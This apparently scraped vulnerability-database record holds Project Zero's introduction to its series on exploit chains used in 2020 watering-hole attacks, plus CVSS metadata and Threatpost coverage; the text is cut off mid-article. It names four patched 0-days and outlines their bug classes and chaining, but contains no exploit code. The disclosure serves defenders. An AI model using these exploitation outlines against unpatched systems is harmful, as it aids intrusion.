Introducing the In-the-Wild Series

2021-01-12T00:00:00

Description

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post. At Project Zero we often refer to our goal simply as “make 0-day hard”. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn’t stray too far from the current state of the art. One of our efforts in this regard is [the tracking](<https://googleprojectzero.blogspot.com/p/0day.html>) of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be [a gap in the security community’s ability to detect 0-day exploits](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>). Therefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor. We discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis. [![Flowchart showing the exploit chain from affected websites, to exploit servers, to Chrome renderers, to Android or Windows privesc, and finally implants.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png>) From the exploit servers, we have extracted: * Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery. * Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows. * A “privilege escalation kit” composed of publicly known n-day exploits for older versions of Android. The four 0-days discovered in these chains have been fixed by the appropriate vendors: * [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-6418.html>) \- Chrome Vulnerability in TurboFan (fixed February 2020) * [CVE-2020-0938](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0938.html>) \- Font Vulnerability on Windows (fixed April 2020) * [CVE-2020-1020](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1020.html>) \- Font Vulnerability on Windows (fixed April 2020) * [CVE-2020-1027](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1027.html>) \- Windows CSRSS Vulnerability (fixed April 2020) We understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the "fast" or "slow" exploitation paths. The Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor. The posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include: * Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques, * A deep look into the bug class of one of the Chrome exploits, and * An in-depth teardown of the Android post-exploitation code. In addition, we are posting [root cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four 0-days discovered as a part of these exploit chains. Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known. We recommend reading the posts in the following order: 1. Introduction (this post) 2. [Chrome: Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) 3. [Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>) 4. [Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>) 5. [Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>) 6. [Windows Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html>) This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 2: Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).

{"id": "GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B", "vendorId": null, "type": "googleprojectzero", "bulletinFamily": "info", "title": "\nIntroducing the In-the-Wild Series\n", "description": "This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.\n\nAt Project Zero we often refer to our goal simply as \u201cmake 0-day hard\u201d. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn\u2019t stray too far from the current state of the art. One of our efforts in this regard is [the tracking](<https://googleprojectzero.blogspot.com/p/0day.html>) of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be [a gap in the security community\u2019s ability to detect 0-day exploits](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>).\n\nTherefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor. \n\nWe discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.\n\n[![Flowchart showing the exploit chain from affected websites, to exploit servers, to Chrome renderers, to Android or Windows privesc, and finally implants.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png>)\n\nFrom the exploit servers, we have extracted:\n\n * Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.\n * Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.\n * A \u201cprivilege escalation kit\u201d composed of publicly known n-day exploits for older versions of Android.\n\nThe four 0-days discovered in these chains have been fixed by the appropriate vendors:\n\n * [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-6418.html>) \\- Chrome Vulnerability in TurboFan (fixed February 2020)\n * [CVE-2020-0938](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0938.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1020](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1020.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1027](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1027.html>) \\- Windows CSRSS Vulnerability (fixed April 2020)\n\nWe understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the \"fast\" or \"slow\" exploitation paths. \n\nThe Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.\n\nThe posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:\n\n * Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,\n * A deep look into the bug class of one of the Chrome exploits, and\n * An in-depth teardown of the Android post-exploitation code.\n\nIn addition, we are posting [root cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four 0-days discovered as a part of these exploit chains. \n\nExploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.\n\nWe recommend reading the posts in the following order:\n\n 1. Introduction (this post)\n 2. [Chrome: Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\n 3. [Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>)\n 4. [Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>)\n 5. [Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>)\n 6. [Windows Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html>)\n\nThis is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 2: Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n", "published": "2021-01-12T00:00:00", "modified": "2021-01-12T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html", "reporter": "GoogleProjectZero", "references": [], "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "immutableFields": [], "lastseen": "2022-08-25T01:57:26", "viewCount": 123, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-202002-11"]}, {"type": "attackerkb", "idList": ["AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "AKB:D1AE859F-1644-40D4-9203-7D8D97ABBB49", "AKB:D673396D-06D8-4D50-B1AD-97679B53A487", "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66"]}, {"type": "avleonov", "idList": ["AVLEONOV:6A714F9BC2BBE696D3586B2629169491"]}, {"type": "cert", "idList": ["VU:354840"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0097", "CPAI-2020-0195", "CPAI-2020-0197", "CPAI-2020-0258"]}, {"type": "chrome", "idList": ["GCSA-2415374810976728715"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2020-0938", "CISA-KEV-CVE-2020-1020", "CISA-KEV-CVE-2020-1027", "CISA-KEV-CVE-2020-6418"]}, {"type": "cve", "idList": ["CVE-2020-0913", "CVE-2020-0938", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4638-1:8959D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-6418"]}, {"type": "exploitdb", "idList": ["EDB-ID:48186"]}, {"type": "fedora", "idList": ["FEDORA:6395E630FBA4", "FEDORA:C3C866194B96"]}, {"type": "gentoo", "idList": ["GLSA-202003-08"]}, {"type": "githubexploit", "idList": ["43EBEC21-E951-555D-B83D-6CE834F5BF3C", "6E95B9E1-979B-595D-A4F4-99125E6059E4", "D253294E-AE35-5B65-8B7D-17D007162D00"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200805-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11678", "KLA11722", "KLA11743", "KLA11744"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8"]}, {"type": "mageia", "idList": ["MGASA-2020-0123"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-BROWSER-CHROME_JSCREATE_SIDEEFFECT-"]}, {"type": "mscve", "idList": ["MS:ADV200002", "MS:ADV200006", "MS:CVE-2020-0938", "MS:CVE-2020-1020", "MS:CVE-2020-1027"]}, {"type": "mskb", "idList": ["KB4550970"]}, {"type": "nessus", "idList": ["701270.PASL", "DEBIAN_DSA-4638.NASL", "FEDORA_2020-39E0B8BD14.NASL", "FEDORA_2020-F6271D7AFA.NASL", "GENTOO_GLSA-202003-08.NASL", "GOOGLE_CHROME_80_0_3987_122.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "OPENSUSE-2020-259.NASL", "REDHAT-RHSA-2020-0738.NASL", "SMB_NT_MS20_APR_4549949.NASL", "SMB_NT_MS20_APR_4549951.NASL", "SMB_NT_MS20_APR_4550917.NASL", "SMB_NT_MS20_APR_4550922.NASL", "SMB_NT_MS20_APR_4550927.NASL", "SMB_NT_MS20_APR_4550929.NASL", "SMB_NT_MS20_APR_4550930.NASL", "SMB_NT_MS20_APR_4550951.NASL", "SMB_NT_MS20_APR_4550961.NASL", "SMB_NT_MS20_APR_4550964.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704638", "OPENVAS:1361412562310816584", "OPENVAS:1361412562310816585", "OPENVAS:1361412562310816586", "OPENVAS:1361412562310816823", "OPENVAS:1361412562310816824", "OPENVAS:1361412562310816825", "OPENVAS:1361412562310816826", "OPENVAS:1361412562310816827", "OPENVAS:1361412562310816828", "OPENVAS:1361412562310816829", "OPENVAS:1361412562310816830", "OPENVAS:1361412562310853048", "OPENVAS:1361412562310877601", "OPENVAS:1361412562310877632"]}, {"type": "osv", "idList": ["OSV:DSA-4638-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156632", "PACKETSTORM:168068"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA"]}, {"type": "redhat", "idList": ["RHSA-2020:0738"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-6418"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0245-1", "OPENSUSE-SU-2020:0259-1"]}, {"type": "thn", "idList": ["THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "THN:DC209DD441842FCD2682680F22D67854"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A", "THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:88098D30DA04E912B06C03B52556385C", "THREATPOST:DF87733B74489628AB9F2C89704380A9"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-6418"]}, {"type": "zdt", "idList": ["1337DAY-ID-34056"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-202002-11"]}, {"type": "attackerkb", "idList": ["AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66"]}, {"type": "avleonov", "idList": ["AVLEONOV:6A714F9BC2BBE696D3586B2629169491"]}, {"type": "cert", "idList": ["VU:354840"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0097", "CPAI-2020-0195", "CPAI-2020-0197", "CPAI-2020-0258"]}, {"type": "chrome", "idList": ["GCSA-2415374810976728715"]}, {"type": "cve", "idList": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4638-1:8959D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-6418"]}, {"type": "exploitdb", "idList": ["EDB-ID:48186"]}, {"type": "fedora", "idList": ["FEDORA:6395E630FBA4", "FEDORA:C3C866194B96"]}, {"type": "gentoo", "idList": ["GLSA-202003-08"]}, {"type": "githubexploit", "idList": ["6E95B9E1-979B-595D-A4F4-99125E6059E4", "D253294E-AE35-5B65-8B7D-17D007162D00"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200805-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11678", "KLA11722", "KLA11743", "KLA11744"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_JSCREATE_SIDEEFFECT"]}, {"type": "mscve", "idList": ["MS:ADV200002", "MS:ADV200006", "MS:CVE-2020-0938", "MS:CVE-2020-1020", "MS:CVE-2020-1027"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4638.NASL", "FEDORA_2020-39E0B8BD14.NASL", "FEDORA_2020-F6271D7AFA.NASL", "GENTOO_GLSA-202003-08.NASL", "GOOGLE_CHROME_80_0_3987_122.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "OPENSUSE-2020-259.NASL", "REDHAT-RHSA-2020-0738.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704638", "OPENVAS:1361412562310816584", "OPENVAS:1361412562310816585", "OPENVAS:1361412562310816586", "OPENVAS:1361412562310816823", "OPENVAS:1361412562310816824", "OPENVAS:1361412562310816825", "OPENVAS:1361412562310816826", "OPENVAS:1361412562310816827", "OPENVAS:1361412562310816828", "OPENVAS:1361412562310816829", "OPENVAS:1361412562310816830", "OPENVAS:1361412562310853048", "OPENVAS:1361412562310877601", "OPENVAS:1361412562310877632"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156632"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-6418"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0245-1", "OPENSUSE-SU-2020:0259-1"]}, {"type": "thn", "idList": ["THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "THN:DC209DD441842FCD2682680F22D67854"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "THREATPOST:0F9EDE9A622A021B9B79C50214D7E8AD", "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A", "THREATPOST:67BFCF521C762895A107ADC4CE661654", "THREATPOST:88098D30DA04E912B06C03B52556385C"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-6418"]}, {"type": "zdt", "idList": ["1337DAY-ID-34056"]}]}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1661392696, "score": 1661392800}, "_internal": {"score_hash": "c7a08755b223538f5ad00d9322df984c"}}

{"threatpost": [{"lastseen": "2021-01-13T17:23:32", "description": "Google researchers have detailed a major hacking campaign that was detected in early 2020, which mounted a series of sophisticated attacks, some using zero-day flaws, against [Windows](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>) and [Android](<https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/>) platforms.\n\nWorking together, researchers from [Google Project Zero](<https://threatpost.com/2-zero-day-bugs-google-chrome/161160/>) and the [Google Threat Analysis Group (TAG)](<https://blog.google/threat-analysis-group/>) uncovered the attacks, which were \u201cperformed by a highly sophisticated actor,\u201d Ryan from Project Zero wrote in the [first](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>) of a six-part blog series on their research.\n\n\u201cWe discovered two exploit servers delivering different exploit chains via watering-hole attacks,\u201d he wrote. \u201cOne server targeted Windows users, the other targeted Android.\u201d\n\n[![2020 Reader Survey: Share Your Feedback to Help Us Improve](https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/18164737/Reader-Survey-Update.jpg)](<https://threatpost.com/2020-reader-survey/161168/>)\n\nWatering-hole attacks target organizations\u2019 oft-used websites and inject them with malware, infecting and gaining access to victims\u2019 machines when users visit the infected sites.\n\nIn the case of the attacks that Google researchers uncovered, attackers executed the malicious code remotely on both the Windows and Android servers using Chrome exploits. The exploits used against Windows included [zero-day](<https://threatpost.com/apple-patches-bugs-zero-days/161010/>) flaws, while Android users were targeted with exploit chains using known \u201cn-day\u201d exploits, though they acknowledge it\u2019s possible zero-day vulnerabilities could also have been used, researchers said.\n\nThe team spent months analyzing the attacks, including examining what happened [post-exploitation on Android devices.](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>) In that case, additional payloads were delivered that collected device fingerprinting information, location data, a list of running processes and a list of installed applications for the phone.\n\n## Zero-Day Bugs\n\nThe researchers posted [root-cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four Windows zero-day vulnerabilities that they discovered being leveraged in their attacks.\n\nThe first, [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/cve-2020-6418-chrome-incorrect-side.html>), is a type confusion bug prior to 80.0.3987.122 leading to remote-code execution. It exists in V8 in Google Chrome (Turbofan), which is the component used for processing JavaScript code. It allows a remote attacker to potentially cause heap corruption via a crafted HTML page.\n\nThe second, [CVE-2020-0938](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0938>), is a a trivial stack-corruption vulnerability in the Windows Font Driver. It can be triggered by loading a Type 1 font that includes a specially crafted BlendDesignPositions object. In the attacks, it was chained with [CVE-2020-1020,](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020>) another Windows Font Driver flaw, this time in the processing of the VToHOrigin PostScript font object, also triggered by loading a specially crafted Type 1 font. Both were used for privilege escalation.\n\n\u201cOn Windows 8.1 and earlier versions, the vulnerability was chained with [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1020>) (a write-what-where condition) to first set up a second stage payload in RWX kernel memory at a known address, and then jump to it through this bug,\u201d according to Google. \u201cThe exploitation process was straightforward because of the simplicity of the issue and high degree of control over the kernel stack. The bug was not exploited on Windows 10.\u201d\n\nAnd finally, [CVE-2020-1027](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1027>) is a Windows heap buffer overflow in the Client/Server Run-Time Subsystem (CSRSS), which is an essential subsystem that must be running in Windows at all times. The issue was used as a sandbox escape in a browser exploit chain using, at times, all four vulnerabilities.\n\n\u201cThis vulnerability was used in an exploit chain together with a 0-day vulnerability in Chrome (CVE-2020-6418). For older OS versions, even though they were also affected, the attacker would pair CVE-2020-6418 with a different privilege escalation exploit (CVE-2020-1020 and CVE-2020-0938).\u201d\n\nAll have all since been patched.\n\n## Advanced Capabilities\n\nFrom their understanding of the attacks, researchers said that threat actors were operating a \u201ccomplex targeting infrastructure,\u201d though, curiously, they didn\u2019t use it every time.\n\n\u201cIn some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox,\u201d according to researchers. \u201cIn these cases, the attacker took a slower approach: sending back dozens of parameters from the end user\u2019s device, before deciding whether or not to continue with further exploitation and use a sandbox escape.\u201d\n\nStill other attack scenarios showed attackers choosing to fully exploit a system straightaway; or, not attempting any exploitation at all, researchers observed. \u201cIn the time we had available before the servers were taken down, we were unable to determine what parameters determined the \u2018fast\u2019 or \u2018slow\u2019 exploitation paths,\u201d according to the post.\n\nOverall, whoever was behind the attacks designed the exploit chains to be used modularly for efficiency and flexibility, showing clear evidence that they are experts in what they do, researchers said.\n\n\u201cThey [use] well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks,\u201d according to the post.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "cvss3": {}, "published": "2021-01-13T16:57:39", "type": "threatpost", "title": "Sophisticated Hacks Against Android, Windows Reveal Zero-Day Trove", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "modified": "2021-01-13T16:57:39", "id": "THREATPOST:88098D30DA04E912B06C03B52556385C", "href": "https://threatpost.com/hacks-android-windows-zero-day/163007/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:51:25", "description": "Microsoft has released its April 2020 Patch Tuesday security updates, its first big patch update released since the [work-from-home era](<https://threatpost.com/malware-risks-triple-for-remote-workers/154735/>) truly got underway. It\u2019s a doozie, with the tech giant disclosing 113 vulnerabilities.\n\nOut of these, 19 are rated as critical, and 94 are rated as important. Crucially, four of the vulnerabilities are being exploited in the wild; and two of them were previously publicly disclosed.\n\nIn all, [the update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>) includes patches for Microsoft Windows, Microsoft Edge (EdgeHTML-based and the Chromium-based versions), ChakraCore, Internet Explorer, Microsoft Office and Microsoft Office Services and Web Apps, Windows Defender, Visual Studio, Microsoft Dynamics, and Microsoft Apps for Android and Mac. They run the gamut from information disclosure and privilege escalation to remote code execution (RCE) and cross-site scripting (XSS).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft has seen a 44 percent increase year-over-year in the number of CVEs patched between January to April, according to Trend Micro\u2019s Zero Day Initiative (ZDI) \u2013 a likely result of an increasing number of researchers looking for bugs and an expanding portfolio of supported products. In March, Patch Tuesday [contained 115 updates](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>); in February, Microsoft 